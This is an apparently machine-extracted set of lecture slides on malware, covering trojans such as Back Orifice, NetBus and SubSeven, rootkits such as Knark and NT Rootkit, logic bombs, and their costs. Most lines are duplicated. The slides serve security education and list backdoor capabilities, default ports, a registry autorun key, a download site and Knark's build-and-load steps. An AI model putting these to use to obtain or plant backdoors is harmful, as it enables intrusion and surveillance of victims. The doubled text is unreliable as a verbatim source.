• I was first introduced to one that grabbed passwords on I was first introduced to one that grabbed passwords on a VAX computer. Someone had written code that a VAX computer. Someone had written code that mimicked the logon screen and sequence… upon mimicked the logon screen and sequence… upon accepting your UserID and password, the owner’s accepting your UserID and password, the owner’s account would issue a “improper occurrence” warning, account would issue a “improper occurrence” warning, and reboot the workstation… then I was able to log on and reboot the workstation… then I was able to log on regularly… but my User ID and password were now in a regularly… but my User ID and password were now in a data file owned by the perpetrator.data file owned by the perpetrator.


TrojansTrojans• Majority of modern trojan horses are backdoor utilitiesMajority of modern trojan horses are backdoor utilities

– Sub Seven Sub Seven – NetbusNetbus– Back OrificeBack Orifice

• Feature set usually includes remote control, desktop Feature set usually includes remote control, desktop viewing, http/ftp server, file sharing, password viewing, http/ftp server, file sharing, password collecting, port redirectioncollecting, port redirection

• Some of these trojan horses can be used as legitimate Some of these trojan horses can be used as legitimate remote administration toolsremote administration tools

• Other trojans are mostly programs that steal/delete Other trojans are mostly programs that steal/delete data or can drop virusesdata or can drop viruses


Windows BackdoorsWindows Backdoors

• Back OrificeBack Orifice• Back Orifice 2000 (BO2K)Back Orifice 2000 (BO2K)• NetBusNetBus• WinVNC (Virtual Network Computing)WinVNC (Virtual Network Computing)• SubSevenSubSeven


Back DoorsBack Doors• A Backdoor allows a malicious attacker to A Backdoor allows a malicious attacker to

maintain privileged access to a compromised maintain privileged access to a compromised hosthost

• Unix back doors are typically installed via a Unix back doors are typically installed via a Worm, Root Kit or manually after a system has Worm, Root Kit or manually after a system has been initially compromisedbeen initially compromised

• Windows back doors are typically installed via Windows back doors are typically installed via a Virus, Worm or Trojan Horse.a Virus, Worm or Trojan Horse.– Virus and Worms via Email, sharing infected files, Virus and Worms via Email, sharing infected files,

Open Windows sharesOpen Windows shares– Trojan Horses typically included with “legitimate” Trojan Horses typically included with “legitimate”

application such as a game etc.application such as a game etc.


Back Orifice/BO2kBack Orifice/BO2k• A “Remote Administration” tool for windows 9x A “Remote Administration” tool for windows 9x

and NT.and NT.• Runs on remote system without user knowingRuns on remote system without user knowing• Client can control several servers Client can control several servers

simultaneouslysimultaneously• Allows client complete control over server Allows client complete control over server

system including logging all keystrokes at the system including logging all keystrokes at the console. (Passwords, email, etc)console. (Passwords, email, etc)

• By default server listens on tcp 54320 or udp By default server listens on tcp 54320 or udp 5432154321


Back Orifice/BO2kBack Orifice/BO2k• It sets itself to be automatically run, by It sets itself to be automatically run, by

modifying the following Windows registry: modifying the following Windows registry: – HKEY_LOCAL_MACHINE\software\Microsoft\Windows\HKEY_LOCAL_MACHINE\software\Microsoft\Windows\

CurrentVersion\vmgr.exe CurrentVersion\vmgr.exe – The "Data" field of this registry entry is set to, "c:\The "Data" field of this registry entry is set to, "c:\

Windows\vmgr.exe". Windows\vmgr.exe".

• Due to this, the Trojan is run at every Windows Due to this, the Trojan is run at every Windows start-up. start-up.

• It’s a remote control utility with extensive It’s a remote control utility with extensive capabilities that can operate on Windows 9X and capabilities that can operate on Windows 9X and Windows NT systems using a client/server model. Windows NT systems using a client/server model. The server is installed on the desired victim or The server is installed on the desired victim or remote system, and the client is located on the remote system, and the client is located on the local system.local system.


Back Orifice/BO2kBack Orifice/BO2k• Besides opening and closing the CD drawer, it can:Besides opening and closing the CD drawer, it can:

– turn on the microphone and record conversationsturn on the microphone and record conversations– Turn on camera to record occurrences in roomTurn on camera to record occurrences in room– create or modify registry keyscreate or modify registry keys– Log keystrokesLog keystrokes– Create dialog boxes and type messagesCreate dialog boxes and type messages– reboot the machinereboot the machine– Get detailed system informationGet detailed system information– Gather passwords (Screensaver, Dialup, Network access)Gather passwords (Screensaver, Dialup, Network access)– Dumps hashed NT passwords from SAM database (for Dumps hashed NT passwords from SAM database (for

later cracking in L0phtCrack)later cracking in L0phtCrack)– Copy, rename, delete, view, and search files and Copy, rename, delete, view, and search files and

directories, even change share attributes.directories, even change share attributes.

If BO2K can’t do it, then the many add-on’s If BO2K can’t do it, then the many add-on’s (always increasing) will be able to.(always increasing) will be able to.


Back Orifice/BO2kBack Orifice/BO2k


Back OrifaceBack Oriface


NetbusNetbus• Provides “Remote Administration” of Windows 9x Provides “Remote Administration” of Windows 9x

and NT systemsand NT systems• Allows full control over windows and devices.Allows full control over windows and devices.

– (open and close windows remotely, Screen (open and close windows remotely, Screen capture, open and close CDROM tray)capture, open and close CDROM tray)

• Logs keystrokesLogs keystrokes• Listens on TCP/UDP 12345 and 12346 Listens on TCP/UDP 12345 and 12346

(configurable v 1.7 and up) for connections(configurable v 1.7 and up) for connections• Listens on TCP/UDP 20034 (v.2.x) for connectionsListens on TCP/UDP 20034 (v.2.x) for connections


NetbusNetbus


SubSevenSubSeven• Windows “remote administration” utility.Windows “remote administration” utility.• Allows full control over windows and devices.Allows full control over windows and devices.• Many features not found in other remote Many features not found in other remote

admin. Toolsadmin. Tools– get Windows CD-Keyget Windows CD-Key– retrieve dialup usernames/passwords, phone retrieve dialup usernames/passwords, phone

numbersnumbers– AOL/Microsoft/Yahoo - IM spyAOL/Microsoft/Yahoo - IM spy– ICQ hijackingICQ hijacking


SubSevenSubSeven


SubSeven: ClientSubSeven: Client

• Easy to use Easy to use interfaceinterface

• Extremely Extremely configurableconfigurable

www.sub7files.comwww.sub7files.com


SubSeven: ServerSubSeven: Server

• Easy to use Easy to use interfaceinterface

• Extremely Extremely configurableconfigurable


AmitisAmitis

ServerServer ClientClient


BeastBeast

ServerServer ClientClient


BeastBeast

The Registry Manager from where you can view and edit the victim registry…an essential

tool for the remote administrator


BeastBeast

• PDF Users GuidePDF Users Guide• Full DocumentationFull Documentation• Bug Reporting….Bug Reporting….


Z-dem0nZ-dem0n


Trojans - JokesTrojans - Jokes

One time this guy walks into a bar…One time this guy walks into a bar…

• Newest category of trojansNewest category of trojans• Designed to look extremely malicious and are Designed to look extremely malicious and are

visual to the uservisual to the user• Don’t really do anything at allDon’t really do anything at all

……OthersOthers


Logic BombsLogic Bombs

• Designed to be extremely maliciousDesigned to be extremely malicious• Hard to detectHard to detect• Run after a certain amount of inactivity Run after a certain amount of inactivity

or in the absence of a certain activityor in the absence of a certain activity• Engineered for maximum effectEngineered for maximum effect• Ex. Some malicious logic bombs can Ex. Some malicious logic bombs can

take advantage of an error in machine take advantage of an error in machine code and start a processor on firecode and start a processor on fire


Logic BombsLogic Bombs

• Tim Lloyd, Omega Engineering Tim Lloyd, Omega Engineering CorporationCorporation

• July 31, 1996 a logic bomb executed July 31, 1996 a logic bomb executed causing a loss of its key manufacturing causing a loss of its key manufacturing programs resulting in a loss of more programs resulting in a loss of more than $10 million. than $10 million.

• 6 lines of code6 lines of code– deltree.exe modified to zzzz read “fixing” deltree.exe modified to zzzz read “fixing”

instead of “deleting”.instead of “deleting”.– Used Purge F:\Used Purge F:\


Easter EggsEaster Eggs

Windows, PhotoShop 6 Windows, PhotoShop 6

1. Open PhotoShop 6 1. Open PhotoShop 6 2. hold down CTRL-ALT 2. hold down CTRL-ALT 3. go to Help > About PhotoShop... 3. go to Help > About PhotoShop... 4. see the cat (Venus in Furs) 4. see the cat (Venus in Furs)



Windows, PhotoShop 6 Windows, PhotoShop 6

1. Hold the Ctrl Alt key and open the About Photoshop 1. Hold the Ctrl Alt key and open the About Photoshop option option 2. The usual Electric Cat screen appears. 2. The usual Electric Cat screen appears. 3. Wait several seconds for the credits to begin scrolling 3. Wait several seconds for the credits to begin scrolling 4. Pressing the Alt key will speed them up... 4. Pressing the Alt key will speed them up... 5. Now, while they're speeding, click the big eye once... 5. Now, while they're speeding, click the big eye once... 6. While still holding the Alt key, press the Ctrl key 6. While still holding the Alt key, press the Ctrl key 7. Let up on the Alt key. 7. Let up on the Alt key. 8. About 60 secret messages will pop up above the 8. About 60 secret messages will pop up above the scrolling credits scrolling credits



Windows, PhotoShop 6 Windows, PhotoShop 6 1.Hold down the Option key 1.Hold down the Option key 2.Choose "Palette Options..." from the Layers 2.Choose "Palette Options..." from the Layers palette palette 3.Merlin window appears 3.Merlin window appears


Bizarre Code….Bizarre Code….

Why did the computer shut Why did the computer shut down unexpectedly?down unexpectedly?

The computer got very The computer got very poorly and decided to end poorly and decided to end it’s own suffering.it’s own suffering.

Makes you wonder what else is hidden?


Unix BackdoorsUnix Backdoors

• Backdoors on Unix are typically a shell bound Backdoors on Unix are typically a shell bound to a network port.to a network port.– A remote attacker can connect to the A remote attacker can connect to the

network port and execute commandsnetwork port and execute commands• A trojaned daemon such as SSH (included in a A trojaned daemon such as SSH (included in a

root kit) may provide root access without a root kit) may provide root access without a password.password.


Root KitsRoot Kits

• A rootkit is a collection of tools that allows the A rootkit is a collection of tools that allows the hacker to provide a backdoor to the system, hacker to provide a backdoor to the system, collect information about other hosts on the collect information about other hosts on the network, mask the fact that the system is network, mask the fact that the system is compromisedcompromised

• Hides the intruder’s activity on the systemHides the intruder’s activity on the system• Allows intruder to keep the privileged accessAllows intruder to keep the privileged access

– NOT to initially obtain itNOT to initially obtain it

• Root Kits are Trojan Horses and typically Root Kits are Trojan Horses and typically provide a Back Door.provide a Back Door.

• Most root kits can be detected by running an Most root kits can be detected by running an integrity checker such as Tripwireintegrity checker such as Tripwire


Root KitsRoot Kits• Original Rootkit was distributed from bulletin boards… Original Rootkit was distributed from bulletin boards…

– the public remained unaware for a few years. Finally the public remained unaware for a few years. Finally mademade

– public in early ‘90s. public in early ‘90s. • Now WIDELY available for many platforms.Now WIDELY available for many platforms.• Include an Ethernet sniffer to help find accesses to other Include an Ethernet sniffer to help find accesses to other

servers.servers.• Once root privilege is obtained in Unix-based OS, then Once root privilege is obtained in Unix-based OS, then

look to trusted hosts.look to trusted hosts.• Modify key programs and overwrite them in the OSModify key programs and overwrite them in the OS• Newer “Kernel-based” rootkits are hard to detect (e.g., Newer “Kernel-based” rootkits are hard to detect (e.g.,

“Knark).“Knark).


T0rn KitT0rn Kit


============================================================== .oooo. oooo o8o . .o8 d8P''Y8b '888 ' ' ' .o8.o888oo 888 888 oooo d8b ooo. .oo. 888 oooo oooo .o888oo 888 888 888 '888''8P '888P'Y88b 888 .8P' '888 888 888 888 888 888 888 888 888888. 888 888 888 . '88b d88' 888 888 888 888 '88b. 888 888 . '888' 'Y8bd8P' d888b o888o o888o o888o o888o o888o '888'=============================================================

$ _./t0rn coded 5000


KnarkKnark

• Kernel based root kit for Linux using Loadable Kernel based root kit for Linux using Loadable Kernel ModuleKernel Module

• Hide filesHide files• Hide running processesHide running processes• Hide active network connectionsHide active network connections• Change the user and group permissions of Change the user and group permissions of

running processesrunning processes


KnarkKnark

• Knark is a kernel-based rootkit for Linux 2.2.Knark is a kernel-based rootkit for Linux 2.2.

No part of knark may be used to break the law, or to cause damage of anyNo part of knark may be used to break the law, or to cause damage of anykind. And I'm not responsible for anything you do with it.kind. And I'm not responsible for anything you do with it.

The heart of the package, knark.c, is a Linux lkm (loadable kernel-module).The heart of the package, knark.c, is a Linux lkm (loadable kernel-module).Type "make" to compile knark and the programs included, and then Type "make" to compile knark and the programs included, and then "insmod knark“ to load the lkm. When knark is loaded, the hidden directory "insmod knark“ to load the lkm. When knark is loaded, the hidden directory /proc/knark is created. The following files are created in this directory:/proc/knark is created. The following files are created in this directory:

CreedCreed shameless self-promotion banner :-)shameless self-promotion banner :-)filesfiles list of hidden files on the systemlist of hidden files on the systemnethidesnethides list of strings hidden in /proc/net/[tcp|udp]list of strings hidden in /proc/net/[tcp|udp]pidspids list of hidden pids, ps-like outputlist of hidden pids, ps-like outputredirectsredirects list of exec-redirection entrieslist of exec-redirection entries


NT RootkitNT Rootkit

• Windows NT or Windows 2000!Windows NT or Windows 2000!• Dynamically loadable kernel device Dynamically loadable kernel device

driver.driver.• Features at a glance:Features at a glance:

– Process hidingProcess hiding– File hidingFile hiding– EXE redirectionEXE redirection


NT RootkitNT Rootkit• Process hidingProcess hiding


NT RootkitNT Rootkit• File hidingFile hiding



• Features continued…Features continued…– Hiding registry valuesHiding registry values– Keyboard sniffer Keyboard sniffer – Rootkit console shellRootkit console shell



• Rootkit console with Keyboard sniffingRootkit console with Keyboard sniffing


The Cost of MalewareThe Cost of Maleware• Money Money

– costs associated with hiring temporary staff to repair costs associated with hiring temporary staff to repair damage and recover datadamage and recover data

• TimeTime – staff time needed to repair damage, recover data, staff time needed to repair damage, recover data,

supervise tempssupervise temps

• ReputationReputation– unexpected downtime (website and/or library) causes unexpected downtime (website and/or library) causes

patrons to go elsewherepatrons to go elsewhere

• TrustTrust– patron’s trust you with their personal information patron’s trust you with their personal information – vendors trust you to authenticate your usersvendors trust you to authenticate your users


MoneyMoney

• Omega Engineering 10 million dollarsOmega Engineering 10 million dollars - - logic bomblogic bomb

• 2000 - The ILOVEYOU and its copycats 2000 - The ILOVEYOU and its copycats caused $6.7 billion in damage in the first caused $6.7 billion in damage in the first five days. five days.


TimeTime

• On September 20, 2001 1200 computers On September 20, 2001 1200 computers at the Fairfax County Library were hit by at the Fairfax County Library were hit by the Nimda virus forcing all of them off the Nimda virus forcing all of them off the network. 150 technicians from the network. 150 technicians from Virginia’s Department of Information Virginia’s Department of Information Technology were called in to help deal Technology were called in to help deal with cleaning the computers – from 30 with cleaning the computers – from 30 minutes to 3 hours each!minutes to 3 hours each!


ReputationReputation

For Release: January 18, 2002 Eli Lilly Settles FTC Charges Concerning Security Breach

Company Disclosed E-mail Addresses of 669 Subscribers to its Prozac Reminder ServiceEli Lilly and Company (Lilly) has agreed to settle Federal Trade Commission charges regarding the unauthorized disclosure of sensitive personal information collected from consumers through its Prozac.com Web site. As part of the settlement, Lilly will take appropriate security measures to protect consumers' privacy…


TrustTrust


TrendsTrends

• More sophisticated intrudersMore sophisticated intruders• More sophisticated attack toolsMore sophisticated attack tools• ““Time to Patch” time decreasingTime to Patch” time decreasing• Increasing permeability of firewallsIncreasing permeability of firewalls• Increased ability to mount distributed Increased ability to mount distributed

attacksattacks• Increased threat from infrastructure Increased threat from infrastructure

attacksattacks– DOS, worms, attacks on DNS system and DOS, worms, attacks on DNS system and

router based attacksrouter based attacks

software security malware: trojans, virii, and worms

Documents